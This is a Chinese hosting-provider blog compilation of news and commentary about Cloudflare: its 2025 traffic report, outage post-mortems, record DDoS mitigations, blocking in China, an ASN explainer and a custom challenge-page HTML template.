Copilot等份额显著提升,谷歌Gemini、DeepSeek等亦进入前十,竞争白热化。 硬件与基础设施的隐形赢家: Starlink:卫星互联网流量同比翻倍,覆盖范围快速扩张,成为传统地面网络的重要补充。 iOS生态:在全球移动流量中占比35%,在丹麦、日本等市场甚至过半,持续定义高端移动体验标准。 趋势二:AI的双刃剑——赋能与“掠夺”并行 AI对互联网的渗透已远超应用层面,深入到了网络流量的本质。 AI爬虫洪流:Googlebot因其兼具搜索索引与AI训练的双重角色,已占到所有HTML请求的4.5%,超过了其他所有AI机器人的总和(4.2%)。2025年,AI用户行为爬取量更是暴增15倍,其中OpenAI的ChatGPT用户是主要驱动力。 高昂的“数据税”:AI爬虫带来了严峻的服务器资源挑战。GPTBot、ClaudeBot已成为robots.txt中最常被全面封禁的对象。Cloudflare创新性地提出 “爬取-引流比” 概念,其中Anthropic平台的比例高达惊人的100,000:1,这意味着其每带来1次用户访问,背后是10万次爬取请求,对网站运营者而言成本效益严重失衡。 【主机帮解读】:对站长而言,AI爬虫是一把双刃剑。它可能带来未来的索引和曝光,但当下正消耗着真实的服务器资源和带宽成本。必须精细化管理robots.txt,并考虑对AI爬虫进行速率限制,以保护站点性能。 趋势三:安全边界被重新定义——攻击规模与复杂性跃升 2025年的网络安全战场,呈现出“量级”与“精度”双双突破的态势。 DDoS进入“30Tbps”新时代:超大规模攻击强度连续刷新纪录,10月峰值达29.7 Tbps,11月更首次突破30Tbps大关,达到31.4 Tbps。这标志着DDoS攻击正式进入一个全新的量级,对任何未受保护的基础设施都是毁灭性的。 机器人流量的“主流化”:全球40%的机器人流量源自美国,而亚马逊AWS与谷歌云合计贡献了全球25%的机器人流量,凸显云基础设施在自动化流量(包括恶意)中的核心地位。 邮件安全:恶意泛滥与“问题域名”:分析邮件中5.6%为恶意邮件,欺诈链接是主要手段。一个极具警示意义的发现是:.christmas和.lol这类新顶级域发送的邮件中,高达99%是垃圾或恶意邮件,为邮件过滤提供了明确的危险信号。 【主机帮解读】:防御必须同步升级。面对30Tbps级DDoS,仅靠机房带宽硬扛已不现实,必须依赖Cloudflare等全球分布、具备超高吞叶量的云清洗服务。同时,安全策略应更关注流量来源,对来自大型云服务商的异常API请求保持警惕。 趋势四:技术栈的静默革命——加密与连接的未来已来 抗量子加密(PQC)成为主流:在苹果iOS 26系统大规模采用的推动下,支持抗量子加密的流量占比从年初的29%猛增至52%,仅用一年时间就在移动端接近普及。这是为应对“先存储,后解密”的量子威胁所做的关键前置准备。 IPv6与HTTP/3稳步推进:IPv6流量占比微增至29%,印度以67%的采用率领跑全球,展示出新兴市场在跳过旧技术时的后发优势。HTTP/3协议占比达到21%,在西班牙等网络质量优异地区(平均下载速度300Mbps)更易发挥其多路复用、零RTT握手的技术优势。 【主机帮】总结与2026年行动建议 Cloudflare 2025年度报告描绘了一个在AI驱动下加速进化、同时安全威胁“水涨船高”的互联网。对每一位网络从业者而言,这意味着: 1. 重新评估“AI-ready”基础设施: 服务器扩容与缓存策略需将AI爬虫的巨大消耗纳入核心考量。 制定明确的AI爬虫管理政策,平衡开放性与运营成本。 2. 以“新量级”规划安全防御: DDoS防护方案必须预设30Tbps以上级别的攻击场景。 ️ 邮件安全网关应更新规则,对.lol、.christmas等恶意邮件高发顶级域实施更严格的默认过滤。 3. 积极拥抱下一代技术标准: 将支持抗量子加密列为Web服务器、负载均衡器及VPN设备的新采购或升级的必备要求。 持续推进内部应用对HTTP/3和IPv6的兼容与优化,特别是在面向全球或移动用户的服务中。 结论: 互联网的“风暴”等级正在系统性提升。无论是AI带来的流量范式转变,还是安全威胁的规模跃迁,都要求我们的技术架构与安全意识必须超前部署。这份报告不是一份过去式的记录,而是面向2026年的一份清晰的行动预告。 (主机帮将持续追踪前沿技术趋势与威胁动态,为您的数字业务提供前瞻性的安全与架构导航。) #### CloudFlare CDN已成为菠菜网站首选CDN CloudFlare作为全球最大的安全CDN服务商,目前已成为菠菜网站的首选CDN,原因是价格便宜,节点强大,防御好,功能强大。 我们现在随便ping一家菠菜网站,几乎都是用CloudFlare的。 但是菠菜在国内是违法的,如果你的网站和这些菠菜同一个IP被国内长城防火墙检测到节点带菠菜的话,IP是会面临封禁的,同时域名也会被墙或者DNS污染,这也是一些使用了CloudFlare的网站个别地方无法访问,甚至没多久就被国内防火墙给墙了的原因,甚至一些地方的网安会把这个带菠菜的IP归属于你的公司,后果非常严重。 所以,如果你的网站属于正常内容的网站,而且主要访客是国内的话,强烈建议不要使用CloudFlare,这并不是危言耸听,而是主机帮客户真实遇到的。CloudFlare在国内也没什么优势,原因是CloudFlare的在国内是没有直接节点的(跟京东云有合作产品),访问速度慢,各别地区打不开。如果你想要使用像CloudFlare一样强大的系统,可以看下京东云星盾,这是CloudFlare跟京东云合作的产品。 #### Cloudflare CDN自选IP节点已废 经常玩Cloudflare的同学都知道, Cloudflare是可以自选节点的,只要是 Cloudflare的节点IP,直接解析过去就可以正常访问,而且没有任何区别,导致有些站长利用自选节点查询一些国内访问比较好的节点,不过今年以来 Cloudflare的节点在国内频繁被屏蔽,官方甚至一度出现几天无法访问的情况。现在官方已经把任意解析IP就可以访问的bug给封了。所有自选IP段的访问都会出现1034的情况。 以后如果你使用Cloudflare的IP段在国内被封了,想通过自选IP更换逃过屏蔽那是不可能的了。 早在去年主机吧就曾预测过Cloudflare在国内迟早要废,果然要废的节奏,主要原因是利用Cloudflare做违法的内容的情况太多了,偏偏Cloudflare在国内是没有审查的,一度放任这些非法内容在自家节点上运行,这下好了,大家都别想用了…… #### Cloudflare CEO : AI 搜索已威胁内容网站生存 科技媒体Axios报道,Cloudflare首席执行官Matthew Prince近日发出行业警告:AI搜索的迅猛发展已对内容出版商的生存构成严重威胁。 流量断崖式下跌 谷歌搜索比例剧变: 从10年前的每抓取2页带来1个访问者,暴跌至如今的1:18 AI公司数据更惊人: OpenAI: 从6个月前的1:250降至当前1:1500 Anthropic: 从1:6000恶化至惊人的1:60000 生存危机根源用户搜索行为已发生根本转变——越来越多用户依赖AI生成的摘要直接获取答案,不再点击来源链接。这导致出版商赖以生存的搜索流量持续萎缩,广告盈利模式濒临崩溃。 必须行动Prince强烈呼吁内容创作者: 争取合理补偿: 要求AI公司为其训练数据付费 主动防御: 利用web应用防火墙屏蔽无视"禁止抓取指令(no crawl)"的爬虫。 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 #### Cloudflare 免费提供爬虫防护:以 AI 生成内容对抗 AI 爬虫 3 月 21 日消息,随着AI时代的来临,AI爬虫也越来越多,很多网站的服务器资源也越来越不够用,原因是大量的AI爬虫爬取网站内容,占用了大量的服务器资源,主机帮的一个客户就是爬虫问题,原本只需5M的带宽,结果被爬虫爬取使得服务器带宽长期运行在15M以上,为此,需要利用Web应用防火墙拦截,国内一些服务商还开发了bot防护功能,不过价格并不便宜,比如百度云防护需要企业版才支持Bot防护,而阿里云、腾讯云也有类似的功能,不过是按拦截次数收费,价格非常昂贵。 相比之下国外网络服务商 Cloudflare非常良心,当地时间本月 19 日发布了一项名为 AI Labyrinth 的有趣功能:利用 AI 生成内容以非禁止的方式干扰不遵守“禁止爬取”声明的 AI 爬虫和其它恶意内容爬取机器人。 Labyrinth 一词的含义即“迷宫”。 根据 Cloudflare 的观察,直接硬性禁止恶意爬虫容易激起爬取和反爬两方无休止的“军备竞赛”,与其陷入一场漫长的对抗中不如让爬虫“以为”得到了真实的内容实际上却一无所获。 AI Labyrinth 的具体运作方式是在页面中设置人类使用者无法看到或点击的隐藏链接,仅有恶意爬虫才会注意到它们。而这些链接指向一系列由 AI 生成的页面,爬虫的时间和资源会浪费在这些非真实网站中。 这一功能也意味仅有恶意 AI 爬虫才会陷入到 AI Labyrinth 编织的内容迷宫中,Cloudflare 能更好了解这些爬虫的行为特征,从而为机器人识别提供数据基础。 Cloudflare 表示 AI Labyrinth 向包括免费客户在内的全部使用者提供。 不过,Cloudflare虽然良心,但其的网络在国内体验并不好,不仅访问慢,而且长期被屏蔽状态,所以并不适合给国内用户访问。 #### Cloudflare 成功防御 3.8Tbps 的 DDoS 攻击 刷新历史! 10 月 2 日消息,Cloudflare 今日发文称,其 DDoS 保护系统自 9 月初以来一直在抵御一个超大规模的 L3/4 DDoS 攻击。 此次攻击一直持续了一整个月,期间包括一百多次超大规模攻击,其中最大一次攻击达到 3.8Tbps,是已公开披过的最大规模的一次攻击。 ▲ 持续 65 秒,每秒 3.8 Tbps 的 DDoS 攻击 ▲ 持续 60 秒,每秒 21.4 亿个数据包的 DDoS 攻击 DDoS 攻击目的是拒绝合法用户访问服务,主要手段是耗尽提供服务所需资源,包括 CPU 资源和网络带宽。攻击者需获取或控制大量设备(僵尸网络)以生成攻击。 Cloudflare 表示,这些攻击主要利用固定端口上的 UDP,且源自全球各地,占比较大的数据来于越南、俄罗斯、巴西、西班牙和美国。 此次攻击活动针对的是金融服务、互联网和电信等行业的多个客户。此次攻击活动的目标是带宽饱和以及在线应用程序和设备的资源耗尽。高数据包速率攻击似乎源自多种类型的受感染设备,包括 MikroTik 设备、DVR 和 Web 服务器,这些设备协同工作,向目标发送大量流量。高比特率攻击似乎源自大量受感染的华硕家用路由器,可能是利用了 Censys 最近发现的 CVE 9.8(严重)漏洞。 #### Cloudflare二次宕机报告出炉:一次为修复高危漏洞引发的全球“止血副作用” 核心摘要 昨夜,Cloudflare公布了一份坦诚得惊人的事故报告,揭示了12月5日全球服务中断25分钟的根本原因。这场波及全球28% HTTP流量的宕机,并非源于攻击,而是源于一个善意的初衷——为全网客户紧急修复此前我们重点预警的React高危漏洞(CVE-2025-55182)。 在升级WAF防护能力的变更过程中,触发了深埋多年的旧代码缺陷,导致连锁故障。 这起事件,是一次为互联网“动外科手术”时引发的意外“大出血”,深刻暴露了现代复杂系统中,安全、变更与稳定性之间脆弱而危险的关系。 时间线与影响 故障窗口: 协调世界时(UTC)12月5日 08:47 至 09:12,持续约25分钟。 影响范围: 全球约28%的HTTP请求受到影响,返回HTTP 500错误。中国大陆网络因架构独立,未受影响。 波及用户: 主要影响仍在使用旧版 FL1智能体(基于Lua)并启用了Cloudflare托管规则集的客户。 技术根源:一次连锁反应的“完美风暴” Cloudflare的报告揭示了从“安全加固”到“全球宕机”的完整逻辑链,每一个环节都值得所有运维与安全工程师深思: 第一步:善意的安全加固为帮助客户防御React Server Components的核弹级RCE漏洞(CVE-2025-55182),Cloudflare决定升级其Web应用防火墙(WAF) 的请求体检测缓冲区,从128KB扩大至1MB,以解析更大的请求数据包进行恶意代码检测。 第二步:全局配置的“核按钮”在此过程中,团队发现一个内部测试工具无法适应新的缓冲区大小,遂决定通过一个全局配置系统将其关闭。该系统设计为“快速全网推送”,而非分区域、分批次灰度发布。这一变更瞬间覆盖了所有服务器。 第三步:引爆“沉睡的代码炸弹”在旧版(FL1)代理中,上述关闭操作,在一个极其特定的条件下,触发了一个已存在多年的旧代码缺陷。当系统处理一条名为 “execute” 的内部规则动作时,因对象为空(nil),引发了Lua运行时错误。 lua -- 触发错误的旧代码逻辑 if rule_result.action == "execute" then -- 当 rule_result.execute 为 nil 时,下一行将崩溃 rule_result.execute.results = ruleset_results[tonumber(rule_result.execute.results_index)] end 第四步:雪崩该错误导致整个规则处理模块崩溃,对受影响服务器的HTTP请求均返回 500 Internal Server Error。 深层问题与“模式化”故障 Cloudflare在报告中坦诚,这是半个月内第二次因“全网快速配置变更”引发的重大事故。11月18日的故障根源与此高度相似。这暴露出其核心部署机制在应对紧急安全更新场景时的系统性脆弱性: 变更安全与灰度发布的缺失: 紧急安全更新往往与“快速”绑定,但“快速全局生效”正是最高风险的变更模式。 技术债务的长尾风险: 一个在旧架构(FL1 Lua)中存在多年、未被触发的缺陷,在特定全局变更下被引爆。新版基于Rust的FL2智能体不受影响,但新旧并存的混合环境是现实的挑战。 “Fail-Close”模式的代价: 当前架构在关键组件出错时选择了“失败即关闭”(返回500),而非更优雅的“Fail-Open”(旁路放行),放大了故障影响。 Cloudflare的补救与承诺 立即冻结: 已冻结所有网络变更,直至建立更安全的回滚与验证机制。 长期工程: 正在推进多项改进,包括增强发布机制、完善故障旁路流程、在关键数据平面启用“Fail-Open”模式。 下周方案: 承诺在下周公布更详尽的系统韧性建设方案。 主机帮实战启示:我们能从中学到什么? 这起事件对所有技术决策者而言,是一堂价值连城的公开课: 1. 安全变更的“铁律”:没有灰度,就没有安全。即便是为了修复安全漏洞的变更,也必须遵循分阶段、可观测、可快速回滚的发布流程。紧急事件更不能成为跳过流程的理由,反而应更谨慎。你的CI/CD流程中,是否为“紧急安全修复”设置了强制性的、最小化的灰度步骤? 2. 技术债务是“定时炸弹”,混部架构加剧风险。新旧系统混部是常态,但必须明确旧系统的“故障边界”和“退役时间表”。对旧系统的任何变更,都应进行跨版本影响评估。你的基础设施中,是否存在类似的“FL1旧组件”?对其变更的风险评估是否充分? 3. 设计“韧性”,而非仅仅“可用性”。系统设计应追求在组件失败时降低影响、维持核心功能。对于网关、代理、WAF等关键路径组件,“Fail-Open”(故障时旁路) 往往是比 “Fail-Close”(故障时拒绝) 更优的选择,前提是安全策略允许。你的关键服务故障模式是“开”还是“关”?是否经过业务风险评估? 4. 依赖第三方,但需建立“逃生通道”。即使强如Cloudflare,也会连续出错。这意味着,深度依赖单一核心第三方服务的架构,本身就是一种高风险架构。你是否为关键DNS、CDN、安全服务准备了手动或自动的、快速切换的备用方案? 结语 Cloudflare的两次事故,本质上是现代互联网“复杂性危机”的缩影。我们正运行着一个由无数快速迭代的、相互深度依赖的、新旧交织的复杂系统构成的全球网络。 安全的悖论在于:有时,为了修复一个已知漏洞而采取的紧急行动,本身就会成为打开未知风险之门的钥匙。 这要求我们,必须用更系统、更冷静、更敬畏的工程哲学来管理每一次变更。 作为互联网的守护者,我们必须在“快速行动”与“稳如磐石”之间,找到那个危险的平衡点。这场25分钟的全球宕机,无疑为整个行业再次校准了这个天平。 (主机帮将持续解读重大基础设施事件,为您提供可落地的安全与稳定性架构见解。) #### cloudflare京东云星盾中防火墙中的ASN 指的是什么? 在京东云星盾安全报表里有一个ASN的报表,很多人不知道这个是什么,今天我们就来科普下。 定义:     自治系统或自治域(英文:Autonomous system, AS)是指在互联网中,一个或多个实体管辖下的所有IP网络和路由器的组合,它们对互联网执行共同的路由策略。参看RFC 1930中更新的定义。   最初自治系统要求由一个单一实体管辖,通常是一个互联网服务提供商或一个拥有到多个网络的独立连接的大型组织,其遵循一个单一且明确的路由策略,参看RFC 1771和边界网关协议(BGP)的初始定义(现已废止)。由于多个组织可使用各自的自治系统编号与将它们连接到互联网的ISP之间运行BGP协议,因此得到较多应用的是RFC 1930中较新的定义。尽管ISP支持了这多个自治系统,但对互联网来说只能看到该ISP的路由策略。所以ISP必须具有一个公开且正式登记的自治系统编号(ASN)。   用于BGP路由中的每个自治系统都被分配一个唯一的自治系统编号(ASN)。对BGP来说,因为ASN是区别整个相互连接的网络中的各个网络的唯一标识,所以这个自治系统编号非常重要。互联网地址分派机构将64512到65535的ASN编号保留给(私有)专用网络使用。 简单来说:   就是在这浩瀚的互联网中,分布着无数个路由器和ip,它们共同组成了一整个大的互联网,而这些ip和路由其实都遵循着一个单一且明确的路由策略,根据BGP边界网关协议,划分为一个个独立的自治系统,而这些独立的自治系统,每一个都会被分配一个唯一的自治系统编号(ASN),而这个编号,即ASN,是这个独立的自治网络在互联网上的唯一标识。其实说白了,ASN就是在互联网上所划分的地区或者区域的名字。就好比在地球上所划分的各个国家,各个国家划分的各个省份一样。不过这样的独立的自治系统一般而言通常都是一个互联网提供商或一个拥有到多个网络的独立连接的大型组织,比如中国联通,电信,移动,腾讯,阿里巴巴,苹果,谷歌等。 下面展示ASN自治系统编号如何搜索和查询: 可以参照下面这个网站:http://as.chacuo.net/ 查询中国所拥有的ASN号:  也可以查询网络公司的: 那么如何查询到具体都有哪些ip在这些ASN上呢? 以阿里巴巴AS451020为例:从这里我们可以了解到分布在这个ASN域下的所有ip和域名,以及ip段。 了解ASN的作用:  通过此方法,可以对相应的目标企业或机构进行信息搜集,通过它的ip反查asn域名,以及通过asn域名号反查该企业下的其他asn号以及asn号下的资产,从而扩大信息收集面。 #### Cloudflare公共 DNS 服务解析故障 大量网站受影响 6月21日消息:Cloudflare是一家总部位于旧金山的跨国科技企业,以向客户提供基于内容分发网络及分布式域名解析服务为主要业务。据Cloudflare的状态页面显示,它在周二上午经历了一次宕机故障。 据Downdetector报道,Cloudflare的技术为互联网上的许多其他网站和服务提供支持,这次中断似乎影响到一系列不同的网站,包括Discord、Shopify、Grindr、Fitbit和Peleton。有关问题的报告在美国东部时间凌晨2:30左右开始。Cloudflare报告说,它在美东时间上午4:06解决了这个问题。 由于使用Cloudflare的1.1.1.1 DNS服务,用户在故障期间根本无法访问任何网站。值得庆幸的是,解决办法很简单:改变你的DNS配置,只要切换回使用ISP的默认DNS设置,就能解决大部分问题。 Cloudflare过去也遇到过类似的问题,比如在2020年7月和8月。对于一家宣传其服务是为了减少宕机时间的公司来说,这不是一个好现象。 #### Cloudflare半月内二次宕机:关键基础设施的“阿喀琉斯之踵” 事件快讯 17:19 关键更新: Cloudflare官方状态页显示,影响其控制面板及相关API的服务问题已实施修复。工程师正在持续监控并调查事件的根本原因。 事件回顾:关键服务再度中断 北京时间12月5日,全球领先的内容分发网络(CDN)与网络安全服务商Cloudflare再次出现服务异常。据其官方状态页面披露,此次故障主要影响Cloudflare控制面板(仪表盘)及相关API,导致依赖这些接口的客户请求失败或收到错误信息。 此次宕机距离上一次大规模全球故障(11月18日)仅过去约半个月。彼时,包括社交平台X、OpenAI的ChatGPT在内的众多一线互联网服务出现访问问题,凸显了Cloudflare作为互联网底层“关键齿轮”的极端重要性。 影响范围:连锁反应显现 尽管Cloudflare强调其核心的CDN与安全防护服务(如DDoS缓解)在此次事件中保持运行,但控制面板与API的故障依然产生了连锁影响: 管理操作中断: 客户无法通过仪表板修改DNS记录、调整安全规则、查看分析数据或管理账户。 自动化流程失败: 依赖Cloudflare API进行自动化配置、部署或集成的服务和脚本出现错误。 用户反馈: 据社区及用户报告,Shopify、Zoom等平台的部分管理功能或集成服务受到波及,进一步印证了其生态影响的广度。 官方回应与关联动态 Cloudflare在事件调查中明确指出,此次故障与另一项计划内维护无关。该维护涉及对底特律和芝加哥数据中心的作业,官方已提前通告。 这一说明意在区分计划与非计划中断,但也引发了业内的进一步关注:在如此短的时间内,同一家顶级基础设施提供商接连发生运营事件,其背后的系统复杂性、变更管理及容灾韧性已成为必须审视的焦点。 主机帮视角:事件背后的安全与韧性启示 对于广大站长、运维及安全团队而言,此次事件远不止一则新闻,它提供了几个至关重要的实战警示: “单点故障”的现代形态: 现代互联网架构高度依赖像Cloudflare这样的全球化第三方服务。当其管理平面出现问题时,即便数据平面正常运行,用户的配置与管理能力也会被“冻结”,这构成了一种新型的业务风险。 API依赖风险: 深度集成Cloudflare API以实现自动化运维,在提升效率的同时,也耦合了其API的可用性风险。需要为关键操作设计降级方案或手动后备路径。 监控与告警的独立性: 当Cloudflare仪表盘本身不可用时,依赖其内建分析进行业务监控的团队将陷入盲区。务必建立独立于服务商之外的第三方或自建监控体系,确保在服务商自身出问题时,你仍是第一个知情者。 灾难恢复计划(DRP)的必备项: 企业的灾难恢复计划中,必须纳入“关键第三方服务长时间不可用”的应对场景,并定期演练。 总结与行动建议 Cloudflare的快速修复能力值得肯定,但半月内的两次事件已为其所有用户敲响警钟:没有任何服务是100%可用的,即便它是互联网的基石。 我们建议您立即采取以下行动: 审查依赖: 明确您业务对Cloudflare各服务模块(DNS、CDN、WAF、API)的依赖程度。 配置备份: 为关键DNS记录、防火墙规则等重要配置保留本地备份,以便在紧急情况下能通过其他途径快速恢复。 设立冗余: 对于极端关键的业务,评估引入第二家CDN或DNS服务商作为地理或服务冗余的可行性。 沟通预案: 准备在第三方服务中断时,与您的用户进行透明沟通的预案。 互联网的韧性建立在分散与冗余之上。此次事件再次证明,将安全与可用性的责任部分寄托于外部时,保持自身的主动权和应变能力,才是构筑稳固防线的终极智慧。 (关注主机帮,获取第一时间的安全事件解读与实战防御指南。) #### Cloudflare又故障了: 路由器配置错误:流量下降 50%、80 多个网站瘫痪 Cloudflare出故障,大量网站随之瘫痪,胆惊受怕了9分钟。 受影响的服务包括Cloudflare API和Cloudflare Recursive DNS,这两项服务都被标注为性能出现降级。在Cloudflare处理网络流量的全球诸多地区,状态页面显示数据在重新路由。Cloudflare首席执行官Matt Prince指出罪魁祸首是美国亚特兰大的一台路由器:他补充道,故障“似乎在20分钟多一点的时间内影响了我们约50%的流量。” 由于Cloudflare为许多非商业和商业网站处理DNS服务和边缘计算服务,因此短暂的服务中断立即引起了注意。处理一半互联网DNS服务的Cloudflare遭遇“故障”。许多网站和服务受影响。突发新闻:重大故障导致网站托管、网络和互联网安全提供商Cloudflare瘫痪。故障基本上已得到解决。80多个网站和应用出现宕机。据称受影响的服务包括:Authy、Digital Ocean、Discord、Downdetector、GitLab、Medium,Patron和Riot等。尽管该事件持续时间很短,但再次向世人提醒关键在线服务是何等脆弱。到这里不得不感慨国外互联网的垄断地位有多严重,一台路由器故障就可能导致半个互联网故障。而国内互联网却是多家鼎立,百家争鸣的现象,这对于普通用户来说是一件好事,也非常有利于未来发展。 #### cloudflare在国内已被屏蔽多日 最近如果有玩cloudflare的站长一定会发现cloudflare进不去了。 原因是被国内墙了,即使国内ping得通,却打不开,而海外却没有这个问题。 查看了下某cloudflare的交流网站几乎都是反馈打不开的状况,这个情况已经持续好多天了,对于使用cloudflare的节点的站长来说是损失巨大的,虽然可以通过切换cloudflare其它节点来解决被墙问题,但是cloudflare官方直接进不去这就影响巨大了。 cloudflare大家都知道全球最牛逼的高防CDN服务商,号称不限防DDOS,而且是免费的! 不过也正因为这样,国内很多非法网站都使用他们的服务,导致cloudflare节点经常被墙,三天两头打不开是常态,这次不知道cloudflare要屏蔽多久,不过主机吧预测cloudflare迟早要在国内彻底玩完的,因为国内很多人利用cloudflare翻墙,甚至黄赌等非法网站的存在一直都没有解决,哪天被注意到了,cloudflare就玩完了。前年百度云加速还推出了cloudflare国内版,不过由于监管问题就直接取消了,所以如果你网站是正规站,还是考虑备案用国内服务器吧,实在不行买个香港服务器也行。 #### cloudflare如何自定义5秒盾页面教程 cloudflare防御DDOS能力很无敌,不过防御CC就需要开启被攻击模式,而一但开启被攻击模式后5盾页面显示的都是英文,非常影响用户体验。 所以我们要用到自定义5秒盾页面,进入cloudflare里找到Custom Pages功能 I'm Under Attack Mode™ Challenge功能, 点击Custom Pages进入,为了方便阅读我们用谷歌浏览器直接翻译了页面   只要做一个类似于网站404的页面的地址,上传到空间上,然后把url地址写上去,发布即可,需要注意的是,一定要页面代码里一定要带::IM_UNDER_ATTACK_BOX:: 比如主机吧设置的 <!doctype html> <html> <head> <meta charset="utf-8"> <title>安全检测</title> <link rel="stylesheet" href="//cdn.bootcss.com/bootstrap/3.3.4/css/bootstrap.min.css"> <script src="//cdn.bootcss.com/jquery/1.11.2/jquery.min.js"></script> <script src="//cdn.bootcss.com/bootstrap/3.3.4/js/bootstrap.min.js"></script> </head> <body> <div class="container" style="margin-top:9%;"> <div class="jumbotron"> <div class="panel panel-success"> </div> <p><h3>系统正在安全检测中,请等待5秒后自动进入</h3></p> <p> ::IM_UNDER_ATTACK_BOX::<p> </div> </div> </body> </html> 发布完后,开启被攻击模式,即可显示你自义的页面了。 自义5秒盾页面免费版是不支持的,需要购买,也可以跟这边购买这边的cloudflare企业版,支持自定义页面、云防火墙等功能。 #### Cloudflare宣布向所有付费用户开放Spectrum服务 4月14日 消息:今日,Cloudflare宣布面向所有付费用户开放 Spectrum 服务。 据悉,Cloudflare Spectrum为全协议反代加速服务,可以为任意 TCP/UDP 应用提供安全防护与加速。 目前,普通付费用户仅支持常见应用协议(SSH 、Minecraft,5G),企业版支持全协议(SSH 、Minecraft、RDP,10G)。 Cloudflare是一家美国的跨国科技企业,以向客户提供网站安全管理、性能优化及相关的技术支持为主要业务。有号称全世界50%的流量都在Cloudflare跑,各大知名互联网公司均有合作,如百度、谷歌、微软均是Cloudflare的客户,其中百度云加速是Cloudflare的中国区合作商,为Cloudflare国内提供加速安防节点,而Cloudflare为百度提供海外加速安全防节点。 #### Cloudflare工作人员误操作 导致大范围中断,诸多服务瘫痪了近一个小时 2025 年 2 月 6 日,Cloudflare 试图阻止 R2 对象存储平台上的一个网络钓鱼 URL,结果事与愿违,引发了大范围中断,导致诸多服务瘫痪了近一个小时。 Cloudflare R2 是一种类似于 Amazon S3 的对象存储服务,专为可扩展、持久、低成本的数据存储而设计。它提供免费的数据检索、S3兼容、跨多个位置的数据复制以及 Cloudflare 服务集成。 一名员工在回应关于 Cloudflare R2 平台上的网络钓鱼 URL 的滥用报告时,中断发生了。 然而,这名员工并没有拦截那个特定的端点,而是误关闭了整个 R2 Gateway 服务。 Cloudflare 在事后分析报告中解释道:“在常规的滥用补救过程中,工作人员接到投诉后采取行动,却无意中禁用了 R2 Gateway 服务,而不是禁用报告的那个特定端点/存储桶。” “这是多个系统级别控制失效和操作人员培训不到位所致,前者是最主要的因素。” 这起事件持续了 59 分钟,发生在 08 点 10 分到 09 点 09 分之间。除了影响 R2 对象存储本身,该事件还影响了以下服务: (1)Stream(视频流):视频上传和视频流分发失败率 100%。 (2)Images(图片):图片上传/下载失败率 100%。 (3)Cache Reserve(缓存保留):操作失败率 100%,导致源端请求增加。 (4)Vectorize(向量化):查询失败率 75%,插入、修改和删除操作失败率 100%。 (5)Log Delivery(日志交付)——延迟和数据丢失:R2 相关的日志其数据丢失率高达13.6%,非 R2 交付作业的数据丢失率高达 4.5%。 (6)Key Transparency Auditor(密钥透明度审计器)——签名发布和读取操作失败率 100%。 也有一些受到间接影响的服务遭遇了局部失败,比如 Durable Objects(持久对象),由于恢复后的重新连接,其错误率增加了 0.09%;比如 Cache Purge(缓存清除),错误增加了 1.8%(HTTP 5xx)、延迟峰值增加了 10 倍;比如 Workers & Pages,部署失败率为 0.002%,仅影响使用 R2 绑定的项目。 服务可用性示意图: Cloudflare 特别指出,人为错误和缺乏安全措施(比如针对影响很大的操作的验证检查)是这次事件的主因。 这家互联网巨头现在已立即实施了修复机制,比如取消了在滥用审查界面中关闭系统的功能,以及在 Admin API 中设置限制,以防止内部帐户禁用服务。 将来会实施的其他措施包括改进帐户配置、实施更严格的访问控制以及针对高风险操作的双方审批流程。 2024 年 11 月,Cloudflare 曾遇到了持续 3 个半小时的另一起重大停机,导致服务中 55% 的日志永久性丢失。 那起事件是由 Cloudflare 的自动缓解系统出现连锁反应式的故障引起的,背后原因是将错误的配置推送到了该公司日志管道中的一个关键组件。 #### Cloudflare成功抵御史上最大DDoS攻击 攻击峰值流量高达每秒 22.2TB 9 月 24 日消息,据科技媒体 bleepingcomputer 9 月 23 日报道,Cloudflare 近日成功拦截了一次破纪录的超大规模分布式拒绝服务(DDoS)攻击,该攻击峰值流量高达每秒 22.2 太比特(Tbps),数据包传输速率达到每秒 106 亿个(Bpps)。 报道指出,这是目前已知公开报道中规模最大且被成功抵御的一次 DDoS 攻击。尽管攻击仅持续约 40 秒,但其产生的巨大流量足以对多数网络防护设施构成严峻考验。 为直观呈现攻击强度,Cloudflare 举例说明:此次攻击的流量相当于同时在线播放 100 万部 4K 超清视频,而每秒 106 亿个数据包的速率,则接近全球每人每秒刷新网页 1.3 次。如此高频的数据包不仅占用大量带宽,更对防火墙、路由器及负载均衡设备造成极大压力,显著增加服务中断的风险。 值得注意的是,类似规模的创纪录攻击正呈现增多趋势。就在三周前,Cloudflare 刚刚抵御了一次峰值达 11.5 Tbps 的 DDoS 攻击;两个月前也曾成功缓解 7.3 Tbps 的攻击流量。而早在今年 4 月,该公司就曾预警其面临的 DDoS 攻击数量已创历史新高,显示出网络威胁形势正在持续加剧。 #### CloudFlare推一键设置免费公共DNS1.1.1.1APP 11 月 12 日消息,著名 CDN 提供商 CloudFlare 在今年 4 月 1 日愚人节推出了 1.1.1.1 公共 DNS 服务,主打安全、加密,提供 IPv4 与 IPv6 服务,用户只需要设置为系统的 DNS 即可使用。 现在 CloudFlare 又趁着 11.11 这个日子,正式推出免费 DNS 服务 1.1.1.1 的 iPhone、iPad 和 Android 专用 App,让手持 iOS 或安卓移动设备用户的一键切换 DNS 到 1.1.1.1。 1.1.1.1 可能是地球上最好记的 IP 地址,而通过最新推出的 App,用户只需要按下开关, App 就会自动为用户完成相关设置,傻瓜式的应用也让 1.1.1.1 也成为最好设置的 DNS。现在用户登录 App Store 和 Google Play 即可下载使用。 不过主机吧测试发现1.1.1.1DNS在国内并不能正常使用,如果您是国内网络,不建议使用这个DNS,还是建议使用老牌DNS114吧 #### Cloudflare收购网络安全公司Area 1 Security 2月24日消息:Cloudflare周三宣布,它将以大约1.62亿美元收购网络安全公司Area 1 Security。Area 1 Security拥有一个云原生平台,正好能够在对企业环境造成破坏之前,检测并消除相关威胁。 图片来自Area 1 Security Area 1 Securityy声称已经阻止了超过4000万个「恶意钓鱼活动,涵盖了商业电子邮件损害、恶意软件、勒索软件和其他高级威胁」。 对于本次收购,Cloudflare 公司联合创始人兼首席执行官 Matthew Prince 评论道: 作为互联网世界中最普遍的网络攻击媒介,电子邮件服务的安全集成,已对任何真正的零信任网络产生了至关重要的影响。 今天,我们隆重欢迎 Area 1 Security 的加入,以帮助 Cloudflare 成为该领域的平台领导者。对我们而言,零信任的未来,还包括了一键式的组织网络 / 应用程序保护解决方案,尤其是最普遍的云电子邮件应用。综上所述,Cloudflare 希望与之携手,带来市面上最畅快、高效、且可靠的电子邮件安全体验。 相关知识: 